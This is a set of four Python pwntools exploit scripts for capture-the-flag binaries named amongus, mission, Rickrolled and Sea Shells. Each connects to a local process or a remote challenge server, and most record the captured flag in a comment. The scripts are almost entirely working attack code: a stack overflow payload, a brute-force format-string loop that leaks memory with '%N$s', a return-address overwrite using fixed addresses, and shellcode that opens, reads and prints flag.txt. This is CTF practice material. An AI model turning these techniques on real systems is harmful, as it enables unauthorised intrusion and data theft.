amongus
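#!/usr/bin/env python3
from pwn import *
# Target binary; pwntools' context takes its defaults from it.
elf = ELF("./amogus_patched")
context.binary = elf
# Terminal command gdb.debug() uses to open the debugger pane.
context.terminal = ['tmux', 'splitw', '-hl', '130']
#context.log_level = "debug"
# gdb commands handed to gdb.debug() as gdbscript when run with GDB=1.
gs = '''
b gameplay
continue
'''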
def one_gadget(filename, base_addr=0):
    """Return the offsets reported by the external ``one_gadget`` tool for
    *filename*, each rebased by adding *base_addr*.

    The tool is run with ``--raw -l1`` and its space-separated decimal
    output is parsed; the command is a fixed argument list (no shell).
    """
    cmd = ['one_gadget', '--raw', '-l1', filename]
    raw = subprocess.check_output(cmd).decode()
    return [base_addr + int(off) for off in raw.split(' ')]
#onegadgets = one_gadget('libc.so.6', libc.address)
def start():
    """Open a tube to the target.

    REMOTE=1 connects to the remote service, GDB=1 launches the binary
    under gdb with the ``gs`` script, otherwise a plain local process.
    """
    if args.REMOTE:
        return remote("43.205.113.100", 8359)
    target = [elf.path]
    return gdb.debug(target, gdbscript=gs) if args.GDB else process(target)
# Global tube used by the helpers below (remote, gdb or local per args).
r = start()
def rcu(d1, d2=0):
    """Discard input through *d1*; with a truthy *d2*, return the bytes
    that follow up to (but excluding) *d2*, otherwise return None."""
    r.recvuntil(d1, drop=True)
    if not d2:
        return None
    return r.recvuntil(d2, drop=True)
def libcbase():
    """Log libc's base address.

    NOTE: this script never assigns ``libc``, so calling this raises
    NameError; it is unused template code.
    """
    return log.info("libc base = %#x" % libc.address)


def logleak(name, val):
    """Log *val* in hex under the label *name*."""
    return log.info(name + " = %#x" % val)


def sa(delim, data):
    """Send *data* after *delim* has been received on the global tube."""
    return r.sendafter(delim, data)


def sla(delim, line):
    """Send *line* plus newline after *delim* has been received."""
    return r.sendlineafter(delim, line)


def sl(line):
    """Send *line* plus newline."""
    return r.sendline(line)


def bc(value):
    """ASCII-encode str(*value*)."""
    return str(value).encode('ascii')


def demangle_base(value):
    """Shift *value* left by 12 bits."""
    return value << 0xc


def remangle(heap_base, value):
    """XOR *value* with heap_base >> 12 (presumably the glibc
    safe-linking formula — unused here)."""
    return (heap_base >> 0xc) ^ value
#========= exploit here ===================
# 32-byte name: 16 filler bytes, "ALIVE" NUL-padded to 8 bytes, then a zero qword.
payload = b"A"*0x10
payload += b"ALIVE"
payload += b"\x00"*3
payload += p64(0)
# Sent as the answer to the "name:" prompt.
sla(b"name:", payload)
#shaktictf{ch@ng3d_fat3_wh3n_I_s@w_r3d_v3nt_}
#========= interactive ====================
r.interactive()
mission
#!/usr/bin/env python3
from pwn import *
# Target binary; pwntools' context takes its defaults from it.
# NOTE: the scan loop further down spawns "./mission", not this patched copy.
elf = ELF("./mission_patched")
context.binary = elf
# Terminal command gdb.debug() uses to open the debugger pane.
context.terminal = ['tmux', 'splitw', '-hl', '130']
#context.log_level = "debug"
# gdb commands handed to gdb.debug() as gdbscript when run with GDB=1.
gs = '''
continue
'''
def start():
    """Open a tube to the target: remote service with REMOTE=1, gdb with
    GDB=1, else a local process.

    Note: a second ``start`` defined later in this file replaces this one.
    """
    if args.REMOTE:
        return remote("127.0.0.1", 1337)
    argv = [elf.path]
    if args.GDB:
        return gdb.debug(argv, gdbscript=gs)
    return process(argv)
#r = start()
def rcu(d1, d2=0):
    """Discard input through *d1*; with a truthy *d2*, return what follows
    up to *d2* (exclusive), else None.

    Uses the module-level ``r``, which this script only binds inside the
    scan loop below.
    """
    r.recvuntil(d1, drop=True)
    return r.recvuntil(d2, drop=True) if d2 else None
def libcbase():
    """Log libc's base address (``libc`` is never assigned in this script)."""
    return log.info("libc base = %#x" % libc.address)


def logleak(name, val):
    """Log *val* in hex, prefixed by *name*."""
    msg = name + " = %#x" % val
    return log.info(msg)


def sa(delim, data):
    """Send *data* once *delim* has arrived."""
    return r.sendafter(delim, data)


def sla(delim, line):
    """Send *line* with a newline once *delim* has arrived.

    The scan loop below rebinds ``sla`` with a per-process lambda.
    """
    return r.sendlineafter(delim, line)


def sl(line):
    """Send *line* with a newline."""
    return r.sendline(line)


def bc(value):
    """Return str(*value*) as ASCII bytes."""
    return str(value).encode('ascii')


def demangle_base(value):
    """Return *value* shifted left by 12 bits."""
    return value << 0xc


def remangle(heap_base, value):
    """Return (heap_base >> 12) XOR *value*."""
    return (heap_base >> 0xc) ^ value
#========= exploit here ===================
from pwn import *
# Replaces the earlier start(): REMOTE/GDB args are no longer honoured and the
# unpatched "./mission" is launched instead of elf.path.
def start():
    """Spawn a fresh local "./mission" process."""
    return process("./mission")
# One fresh process per candidate position i: answer the y/n prompt, send a
# positional "%<i>$s" specifier, and read back the line printed after
# "working with you". Stops at the first line containing b"testflag".
for i in range(64, 0x300):
    try:
        r = start()
        # Per-process helper; shadows the module-level sla for this iteration.
        sla = lambda d, s: r.sendlineafter(d, s)
        sla(b"/n)", b"y")
        fmt = f"%{i}$s".encode()
        sla(b"again?", fmt)
        try:
            r.recvuntil(b"working with you")
        except EOFError:
            # Process died before echoing the prompt; move on to the next i.
            log.warning(f"[{i}] EOF before prompt")
            r.close()
            continue
        try:
            leak = r.recvline(timeout=0.2).strip()
        except EOFError:
            log.warning(f"[{i}] EOF during leak recv")
            r.close()
            continue
        if b"testflag" in leak:
            log.success(f"[{i}] Found flag: {leak}")
            r.close()
            break
        else:
            log.info(f"[{i}] Leak: {leak}")
            r.close()
    except Exception as e:
        # NOTE(review): pwntools' log.error raises after logging, so any other
        # exception ends the whole loop here; r.close() is also skipped on that
        # path, leaving the child process open. Confirm this is intended.
        log.error(f"[{i}] Exception: {e}")
#========= interactive ====================
#r.interactive()
Rickrolled
#!/usr/bin/env python3
from pwn import *
# Target binary; pwntools' context takes its defaults from it.
elf = ELF("./rickrolled_patched")
# libc is referenced only by libcbase() via libc.address; ld is loaded but unused.
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")
context.binary = elf
# Terminal command gdb.debug() uses to open the debugger pane.
context.terminal = ['tmux', 'splitw', '-hl', '130']
#context.log_level = "debug"
# gdb commands handed to gdb.debug() as gdbscript when run with GDB=1.
gs = '''
b main
continue
'''
def one_gadget(filename, base_addr=0):
    """Run the external ``one_gadget`` tool (``--raw -l1``) on *filename*
    and return its space-separated integer offsets, each plus *base_addr*.
    The command is passed as an argument list, never through a shell."""
    output = subprocess.check_output(
        ['one_gadget', '--raw', '-l1', filename]
    ).decode()
    offsets = [int(tok) for tok in output.split(' ')]
    return [off + base_addr for off in offsets]
#onegadgets = one_gadget('libc.so.6', libc.address)
def start():
    """Return a tube to the target chosen by the pwntools args:
    REMOTE -> remote service, GDB -> binary under gdb with ``gs``,
    otherwise a local process."""
    if args.REMOTE:
        return remote("43.205.113.100", 8862)
    argv = [elf.path]
    return gdb.debug(argv, gdbscript=gs) if args.GDB else process(argv)
# Global tube used by the helpers below (remote, gdb or local per args).
r = start()
def rcu(d1, d2=0):
    """Skip input through *d1*. If *d2* is truthy, return the bytes between
    *d1* and *d2*; otherwise return None."""
    r.recvuntil(d1, drop=True)
    if not d2:
        return None
    return r.recvuntil(d2, drop=True)
def libcbase():
    """Log the resolved libc base address."""
    return log.info("libc base = %#x" % libc.address)


def logleak(name, val):
    """Log *val* as hex under the label *name*."""
    return log.info(name + " = %#x" % val)


def sa(delim, data):
    """Send *data* after *delim* arrives on the global tube."""
    return r.sendafter(delim, data)


def sla(delim, line):
    """Send *line* plus newline after *delim* arrives."""
    return r.sendlineafter(delim, line)


def sl(line):
    """Send *line* plus newline."""
    return r.sendline(line)


def bc(value):
    """str(*value*) encoded as ASCII."""
    return str(value).encode('ascii')


def demangle_base(value):
    """*value* shifted left by 12 bits."""
    return value << 0xc


def remangle(heap_base, value):
    """(heap_base >> 12) XOR *value* (unused in this script)."""
    return (heap_base >> 0xc) ^ value
#========= exploit here ===================
# 48 filler bytes followed by two little-endian qwords: 0x405100 and 0x40125a.
# NOTE(review): fixed addresses — confirm they match the patched binary's layout.
payload = b"A"*48
payload += p64(0x405000+0x100)
payload += p64(0x000000000040125a)
# Sent as the reply to the prompt ending in "me?\n".
sla(b"me?\n", payload)
#shakticon25{r0p_cH@!n_n3v3r_gOnna_let_u_dowN}
#========= interactive ====================
r.interactive()
Sea Shells
This one was easy, but cool
#!/usr/bin/env python3
from pwn import *
# Target binary; pwntools' context (used by asm() below) takes its defaults from it.
elf = ELF("./seashells_patched")
# libc is referenced only by libcbase() via libc.address; ld is loaded but unused.
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")
context.binary = elf
# Terminal command gdb.debug() uses to open the debugger pane.
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
# gdb commands handed to gdb.debug() as gdbscript when run with GDB=1.
gs = '''
continue
'''
def start():
    """Open a tube to the target: the remote service with REMOTE=1, the
    binary under gdb (script ``gs``) with GDB=1, else a local process."""
    if args.REMOTE:
        return remote("43.205.113.100", 8014)
    argv = [elf.path]
    if args.GDB:
        return gdb.debug(argv, gdbscript=gs)
    return process(argv)
# Global tube used by the helpers below (remote, gdb or local per args).
r = start()
def rcu(d1, d2=0):
    """Consume input through *d1*; return the bytes up to *d2* when *d2* is
    truthy, otherwise None."""
    r.recvuntil(d1, drop=True)
    return r.recvuntil(d2, drop=True) if d2 else None
def libcbase():
    """Log the resolved libc base address."""
    return log.info("libc base = %#x" % libc.address)


def logleak(name, val):
    """Log *val* in hex, labelled *name*."""
    text = name + " = %#x" % val
    return log.info(text)


def sa(delim, data):
    """Send *data* once *delim* has been received."""
    return r.sendafter(delim, data)


def sla(delim, line):
    """Send *line* plus newline once *delim* has been received."""
    return r.sendlineafter(delim, line)


def sl(line):
    """Send *line* plus newline."""
    return r.sendline(line)


def bc(value):
    """ASCII bytes of str(*value*)."""
    return str(value).encode('ascii')


def demangle_base(value):
    """*value* << 12."""
    return value << 0xc


def remangle(heap_base, value):
    """(heap_base >> 12) ^ *value* (unused in this script)."""
    return (heap_base >> 0xc) ^ value
#========= exploit here ===================
# Shellcode sent to the ">>" prompt: open "flag.txt" read-only, read up to
# 0x100 bytes from the returned fd onto the stack, then write them to stdout.
# asm() assembles it for the context set from elf above.
sc = shellcraft.open('flag.txt', 0) # syscall open("flag.txt", O_RDONLY)
sc += shellcraft.read('rax', 'rsp', 0x100) # syscall read(fd=rax, buf=rsp, 0x100 bytes); rax holds open()'s return value
sc += shellcraft.write(1, 'rsp', 0x100) # syscall write(1, rsp, 0x100)
payload = asm(sc)
sla(b">>", payload)
#========= interactive ====================
r.interactive()